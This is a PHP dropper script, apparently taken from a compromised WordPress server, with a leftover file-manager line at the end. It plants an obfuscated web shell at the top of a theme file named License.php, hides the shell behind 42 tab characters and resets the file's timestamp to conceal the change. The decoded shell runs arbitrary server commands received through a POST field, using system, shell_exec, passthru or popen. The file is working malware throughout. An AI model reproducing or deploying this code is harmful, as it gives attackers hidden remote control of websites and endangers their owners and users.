<?php  $path = '/home/grlogisticsandse/public_html/wp-content/themes/License.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24reference1%20%3D%20%27737%27%3B%24reference2%20%3D%20%27973%27%3B%24reference3%20%3D%20%27746%27%3B%24reference4%20%3D%20%27865%27%3B%24reference5%20%3D%20%27727%27%3B%24reference6%20%3D%20%27472%27%3B%24reference7%20%3D%20%27656%27%3B%24reference8%20%3D%20%2716d%27%3B%24reference9%20%3D%20%275f6%27%3B%24reference10%20%3D%20%27765%27%3B%24reference11%20%3D%20%27745%27%3B%24reference12%20%3D%20%27f63%27%3B%24reference13%20%3D%20%276f6%27%3B%24reference14%20%3D%20%27e74%27%3B%24reference15%20%3D%20%27706%27%3B%24reference16%20%3D%20%276f7%27%3B%24reference17%20%3D%20%27365%27%3B%24reference18%20%3D%20%27636%27%3B%24reference19%20%3D%20%27f6e%27%3B%24reference20%20%3D%20%27666%27%3B%24reference21%20%3D%20%27967%27%3B%24reference22%20%3D%20%27167%27%3B%24secure_access1%20%3D%20pack%28%22H%2A%22%2C%20%24reference1.%24reference2.%24reference3.%2756d%27%29%3B%24secure_access2%20%3D%20pack%28%22H%2A%22%2C%20%27736%27.%24reference4.%276c6%27.%27c5f%27.%27657%27.%27865%27%29%3B%24secure_access3%20%3D%20pack%28%22H%2A%22%2C%20%27657%27.%24reference4%29%3B%24secure_access4%20%3D%20pack%28%22H%2A%22%2C%20%27706%27.%27173%27.%27737%27.%27468%27.%24reference5%29%3B%24secure_access5%20%3D%20pack%28%22H%2A%22%2C%20%27706%27.%27f70%27.%27656%27%29%3B%24secure_access6%20%3D%20pack%28%22H%2A%22%2C%20%24reference1.%24reference6.%24reference7.%24reference8.%24reference9.%24reference10.%24reference11.%24reference12.%24reference13.%24reference14.%24reference7.%27e74%27%29%3B%24secure_access7%20%3D%20pack%28%22H%2A%22%2C%20%24reference15.%2736c%27.%24reference16.%24reference17%29%3B%24config_manager%20%3D%20pack%28%22H%2A%22%2C%20%24reference18.%24reference19.%24reference20.%24reference21.%24reference9.%27d61%27.%276e6%27.%24reference22.%27657%27%29%3Bif%28isset%28%24_POST%5B%24config_manager%5D%29%29%7B%24config_manager%3Dpack%28%22H%2A%22%2C%24_POST%5B%24config_manager%5D%29%3Bif%28function_exists%28%24secure_access1%29%29%7B%24secure_access1%28%24config_manager%29%3B%7Delseif%28function_exists%28%24secure_access2%29%29%7Bprint%20%24secure_access2%28%24config_manager%29%3B%7Delseif%28function_exists%28%24secure_access3%29%29%7B%24secure_access3%28%24config_manager%2C%24item_symbol%29%3Bprint%20join%28%22%5Cn%22%2C%24item_symbol%29%3B%7Delseif%28function_exists%28%24secure_access4%29%29%7B%24secure_access4%28%24config_manager%29%3B%7Delseif%28function_exists%28%24secure_access5%29%26%26function_exists%28%24secure_access6%29%26%26function_exists%28%24secure_access7%29%29%7B%24res_token%3D%24secure_access5%28%24config_manager%2C%22r%22%29%3Bif%28%24res_token%29%7B%24rec_flg%3D%24secure_access6%28%24res_token%29%3B%24secure_access7%28%24res_token%29%3Bprint%20%24rec_flg%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             @touch($path, $ft);             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die('!success!');             }         }     } } die('!failed!'); 

• [F] .fac
  Delete